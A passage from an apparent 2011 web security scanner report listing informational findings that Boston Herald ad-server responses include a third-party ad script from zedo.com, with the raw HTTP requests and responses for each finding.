document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.280. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

Issue detail

The response dynamically includes the following script from another domain (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n');
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.281. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

Issue detail

The response dynamically includes the following script from another domain (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.282. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain (as visible in the truncated response below):

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.283. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 335
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="10/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.284. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.285. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.286. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.287. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.288. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.289. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.290. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.291. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.292. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.293. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __qca=P0-1247593866-1296251843767

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.294. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

